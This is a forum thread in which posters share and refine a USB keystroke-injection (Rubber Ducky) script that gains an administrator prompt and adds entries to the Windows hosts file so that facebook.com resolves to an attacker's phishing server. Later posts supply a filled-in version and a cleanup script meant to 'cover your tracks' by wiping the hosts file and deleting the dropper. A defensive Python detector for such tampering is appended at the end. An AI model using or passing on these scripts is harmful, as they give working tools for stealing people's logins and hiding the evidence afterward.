KoryusaiKun (posted October 22, 2011)

Hi everyone,

This is my first post and first script for the Rubber Ducky. I have not yet tested this script as I am still waiting to receive it here in the UK. I got it from when I was talking to my friend about something he called desktop phishing; it basically replaces, say, Facebook's or any other site's IP with your chosen server's IP in the hosts file. Anyway, here's the script:

REM Author: .:Koryusai-Kun:.
REM Description: Used for phishing, it adds an IP of your choosing to the hosts file on Windows
REM Description: so when the user types into their web browser for example www.facebook.com it
REM Description: instead of going to the proper IP it goes to the one in the hosts file, your evil one.
REM Description: you need to add the www. version and without it as well.
REM ---[Start CMD as administrator]-----------------------
GUI
DELAY 50
STRING cmd
DELAY 150
MENU
DELAY 75
STRING a
Enter
DELAY 200
LEFT
ENTER
STRING cls
ENTER
REM ---[END]----------------------------------------------
DELAY 300
REM ---[Inject into the host file]------------------------
STRING copy con inject.bat
ENTER
STRING SET NEWLINE=^& echo.
ENTER
ENTER
STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts
ENTER
STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts
ENTER
ENTER
STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts
ENTER
STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts
ENTER
CONTROL z
ENTER
STRING inject.bat
ENTER
REM ---[END]----------------------------------------------
DELAY 200
STRING exit
ENTER
Sl1m (posted October 22, 2011, edited)

Sounds awesome! Anyone tried this? Where do you replace the bogus IP and website?

Edited October 22, 2011 by Sl1m
KoryusaiKun (author, posted October 22, 2011)

You replace [WEBSITE_ADDRESS] with the website, like www.facebook.com, and the second one with facebook.com, then you put the evil server IP where [EVIL_SERVER_IP] is. Here's an example:

...
REM ---[END]----------------------------------------------
DELAY 300
REM ---[Inject into the host file]------------------------
STRING copy con inject.bat
ENTER
STRING SET NEWLINE=^& echo.
ENTER
ENTER
STRING FIND /C /I "www.facebook.com" %WINDIR%\system32\drivers\etc\hosts
ENTER
STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^127.0.0.1 www.facebook.com>>%WINDIR%\system32\drivers\etc\hosts
ENTER
ENTER
STRING FIND /C /I "facebook.com" %WINDIR%\system32\drivers\etc\hosts
ENTER
STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^127.0.0.1 facebook.com>>%WINDIR%\system32\drivers\etc\hosts
ENTER
CONTROL z
ENTER
STRING inject.bat
ENTER
REM ---[END]----------------------------------------------
...
Sl1m (posted October 22, 2011)

Thank you!! I will try it when I get home later :)
KoryusaiKun (author, posted October 22, 2011)

No problem mate, hope it works.
Sl1m (posted October 26, 2011)

How do you reverse it if you wanna reset the default settings? (Meaning you wanna direct the user to the real page.) Thanks
devenv (posted October 27, 2011)

> How do you reverse it if you wanna reset the default settings? (Meaning you wanna direct the user to the real page.) Thanks

xcopy the original file first, before you edit it, to host.backup. After you're done you can replace the hacked file with the original.
skimpniff (posted February 19, 2012, edited)

> (quoting KoryusaiKun's original post and script from the top of the thread)

I've not been able to get this to successfully execute. Can anyone confirm its successful operation?

I tweaked the delays and it works like a charm.

My next project related to this is a quick edit to this that will include the commands necessary (replying "yes") to overwrite the existing hosts file. For those not familiar, if you successfully execute this command and try to run it again, you are prompted with a command line prompt asking for permission to overwrite the existing file. As soon as I have it tested and working, I'll post it.

I went a simpler route, see the following post.

Edited February 28, 2012 by skimpniff
skimpniff (posted February 28, 2012, edited)

> (quoting KoryusaiKun's original post and script from the top of the thread)

Here is a cleanup script. Very simple, for if you want to reset the hosts file to empty to cover your tracks.

REM Author: skimpniff
REM Description: Clean up by resetting the hosts file back to empty and deleting the inject.bat file
ESCAPE
CONTROL ESCAPE
DELAY 600
STRING cmd
DELAY 1000
MENU
DELAY 1000
STRING a
DELAY 1000
LEFT
DELAY 1000
ENTER
DELAY 400
STRING cd drivers\etc\
DELAY 400
ENTER
DELAY 400
STRING copy con hosts
DELAY 400
ENTER
ENTER
DELAY 400
STRING All
ENTER
ENTER
DELAY 400
CONTROL z
DELAY 400
ENTER
DELAY 400
STRING exit
ENTER

Here is a modification to add to the bottom of the original that deletes the inject.bat file:

CONTROL z
ENTER
DELAY 400
STRING inject.bat
ENTER
DELAY 400
STRING del c:\windows\system32\inject.bat
ENTER
DELAY 400
STRING exit
ENTER

Edited February 28, 2012 by skimpniff
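The two things a defender would want from this thread are a way to spot the entries the inject script appends (a well-known name pointed at a non-loopback address) and a way to compare the live hosts file against the xcopy backup devenv recommends, including the case where the cleanup script above has overwritten the file with a single word. The following Python is an added example written for this page, not code from the thread or from any of its posters. The hosts-file contents and the 203.0.113.7 address (TEST-NET-3 documentation range) are constructed sample data; on a real workstation you would read %WINDIR%\system32\drivers\etc\hosts and your own backup instead.

```python
import ipaddress
from dataclasses import dataclass

# Constructed sample: a Windows hosts file after the thread's inject.bat has
# appended two lines pointing facebook.com at an attacker-controlled host.
# 203.0.113.7 is a documentation-range address, chosen for this example only.
TAMPERED_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
#	127.0.0.1       localhost
#	::1             localhost

203.0.113.7 www.facebook.com
203.0.113.7 facebook.com
"""

# Constructed baseline: the stock Windows hosts file is comments only, so
# every active entry in the live file is a deviation worth a look.
BASELINE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
#	127.0.0.1       localhost
#	::1             localhost
"""


@dataclass(frozen=True)
class HostsEntry:
    ip: str
    name: str


def parse_hosts(text):
    """Return the active (non-comment) entries of a hosts file.
    Inline '#' comments are stripped and one line may carry several names."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if len(parts) < 2:          # e.g. the lone word the cleanup script writes
            continue
        try:
            ip = ipaddress.ip_address(parts[0])
        except ValueError:          # not an address: ignore the line
            continue
        for name in parts[1:]:
            entries.append(HostsEntry(str(ip), name.lower()))
    return entries


def suspicious_entries(entries):
    """Flag entries that send a name anywhere other than loopback or the
    unspecified address (0.0.0.0, common in ad-block lists). Redirecting a
    public site to a routable address is exactly what hosts-file phishing does."""
    flagged = []
    for e in entries:
        addr = ipaddress.ip_address(e.ip)
        if not (addr.is_loopback or addr.is_unspecified):
            flagged.append(e)
    return flagged


def added_since_baseline(current_text, baseline_text):
    """Entries in the live file that are absent from a known-good copy
    (the host.backup made with xcopy before any edit)."""
    baseline = set(parse_hosts(baseline_text))
    return [e for e in parse_hosts(current_text) if e not in baseline]


def looks_wiped(text):
    """True when the file has neither active entries nor any comment line:
    the stock Microsoft header is gone, which is what the cleanup script's
    'copy con hosts' overwrite leaves behind."""
    has_comment = any(l.strip().startswith("#") for l in text.splitlines())
    return not has_comment and not parse_hosts(text)


if __name__ == "__main__":
    for e in suspicious_entries(parse_hosts(TAMPERED_HOSTS)):
        print(f"suspicious: {e.name} -> {e.ip}")
    for e in added_since_baseline(TAMPERED_HOSTS, BASELINE_HOSTS):
        print(f"added vs baseline: {e.name} -> {e.ip}")
    print("wiped:", looks_wiped("All\n\n"))
```

Run periodically (or from a file-integrity monitor triggered on the hosts file's modification time), the three checks cover both halves of the thread: the append that the inject script performs shows up as a suspicious, non-baseline entry, and the cleanup script's overwrite shows up as a wiped file even though it contains no entries at all.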